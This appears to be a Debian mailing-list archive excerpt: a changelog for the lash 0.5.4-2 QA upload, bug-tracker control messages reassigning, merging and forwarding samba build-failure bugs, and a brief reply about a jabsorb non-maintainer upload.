Maintainer: Debian QA Group packa...@qa.debian.org
Changed-By: Barry deFreese bdefre...@debian.org
Description:
lash-bin - LASH Audio Session Handler (LASH) example clients
lash-doc - LASH Audio Session Handler (LASH) documentation
lashd - LASH Audio Session Handler (LASH) server
liblash-dev - LASH Audio Session Handler (LASH) development files
liblash2 - LASH Audio Session Handler (LASH) shared library files
python-lash - Python bindings for liblash2
Closes: 490280 521958 527422
Changes:
lash (0.5.4-2) unstable; urgency=low
.
* QA upload.
+ Set maintainer to Debian QA Group packa...@qa.debian.org.
* Fix LASH acronym in package description. (Closes: #490280).
* Move libjack0.100.0-dev build-dep to libjack-dev. (Closes: #527422).
* 03_netdb.patch - Fix FTBFS. (Closes: #521958).
+ Modified patch from Luca Falavigna, thanks.
* Add ${misc:Depends for debhelper package.
* Change python to Python in package
Processed: Re: Bug#547147: as stated in #546926, libsmbclient and libwbclient0 depend on libtalloc1(broken dep)
Processing commands for cont...@bugs.debian.org: reassign 547147 samba Bug #547147 [libsmbclient] as stated in #546926, libsmbclient and libwbclient0 depend on libtalloc1(broken dep) Bug reassigned from package 'libsmbclient' to 'samba'. forcemerge 546828 547147 Bug#546828: samba: FTBFS with new talloc Bug#547147: as stated in #546926, libsmbclient and libwbclient0 depend on libtalloc1(broken dep) Forcibly Merged 546828 547147. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: bug 546828 is forwarded to https://bugzilla.samba.org/show_bug.cgi?id=6742
Processing commands for cont...@bugs.debian.org: forwarded 546828 https://bugzilla.samba.org/show_bug.cgi?id=6742 Bug #546828 [samba] samba: FTBFS with new talloc Bug #547147 [samba] as stated in #546926, libsmbclient and libwbclient0 depend on libtalloc1(broken dep) Set Bug forwarded-to-address to 'https://bugzilla.samba.org/show_bug.cgi?id=6742'. Set Bug forwarded-to-address to 'https://bugzilla.samba.org/show_bug.cgi?id=6742'. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#521942: jabsorb: diff for NMU version 1.3-1.1
David Paleino d.pale...@gmail.com writes: I've prepared an NMU for jabsorb (versioned as 1.3-1.1) and am going to upload it to DELAYED/7 on Sep, 21 (you then have ~10days to do an upload and cancel the NMU). Don't bother with the DELAYED, just do a zero-day NMU. -- * Sufficiently advanced magic is indistinguishable from technology (T.P) * * PGP public key available @ http://www.iki.fi/killer * -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
